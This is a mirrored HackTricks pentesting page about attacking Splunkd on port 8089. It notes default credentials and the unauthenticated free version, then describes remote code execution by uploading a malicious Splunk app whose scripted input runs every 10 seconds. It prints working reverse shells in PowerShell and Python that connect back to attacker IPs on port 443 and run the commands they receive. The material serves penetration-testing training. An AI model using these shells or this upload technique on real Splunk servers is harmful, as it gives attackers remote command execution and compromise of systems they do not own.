mirror of https://github.com/carlospolop/hacktricks synced 2024-12-18 17:16:10 +00:00

Carlos Polop 6be43c15e9 Recreating repository history

2024-12-12 11:39:29 +01:00

6.2 KiB

Raw Blame History

8089 - Pentesting Splunkd

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

Basic Information

Log analytics tool used for data gathering, analysis, and visualization
Commonly used in security monitoring and business analytics
Default ports:
- Web server: 8000
- Splunkd service: 8089

Vulnerability Vectors:

Free Version Exploitation

Trial version automatically converts to free version after 60 days
Free version lacks authentication
Potential security risk if left unmanaged
Administrators may overlook security implications

Credential Weaknesses

Older versions: Default credentials admin:changeme
Newer versions: Credentials set during installation
Potential for weak password use (e.g., admin, Welcome, Password123)

Remote Code Execution Opportunities

Multiple code execution methods:
- Server-side Django applications
- REST endpoints
- Scripted inputs
- Alerting scripts
Cross-platform support (Windows/Linux)
Scripted inputs can run:
- Bash scripts
- PowerShell scripts
- Batch scripts

Key Exploitation Potential:

Sensitive data storage
Lack of authentication in free version
Multiple vectors for potential remote code execution
Possibility of leveraging scripted inputs for system compromise

Shodan

Splunk build

RCE

Create Custom Application

Splunk offers a sophisticated method for remote code execution through custom application deployment, leveraging its cross-platform scripting capabilities. The core exploitation technique revolves around creating a malicious application that can execute reverse shells on both Windows and Linux systems.

A custom application can run Python, Batch, Bash, or PowerShell scripts. Moreover, Splunk comes with Python installed, so even in Windows systems you will be able to run python code.

You can use this example with the bin containing example for Python and PowerShell. Or you could create your own.

The exploitation process follows a consistent methodology across platforms:

splunk_shell/
├── bin        (reverse shell scripts)
└── default    (inputs.conf configuration)

The critical configuration file inputs.conf enables the script by:

Setting disabled = 0
Configuring a 10-second execution interval
Defining the script's source type

Deployment is straightforward:

Create the malicious application package
Set up a listener (Netcat/socat) on the attacking machine
Upload the application through Splunk's interface
Trigger automatic script execution upon upload

Sample Windows PowerShell reverse shell:

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
  $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
  $sendback = (iex $data 2>&1 | Out-String );
  $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
  $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
  $stream.Write($sendbyte,0,$sendbyte.Length);
  $stream.Flush()
};
$client.Close()

Sample Linux Python reverse shell:

import sys, socket, os, pty
ip = "10.10.14.15"
port = "443"
s = socket.socket()
s.connect((ip, int(port)))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')

RCE & Privilege Escalation

In the following page you can find an explanation how this service can be abused to escalate privileges and obtain persistence:

{% content-ref url="../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md" %} splunk-lpe-and-persistence.md {% endcontent-ref %}

References

https://academy.hackthebox.com/module/113/section/1213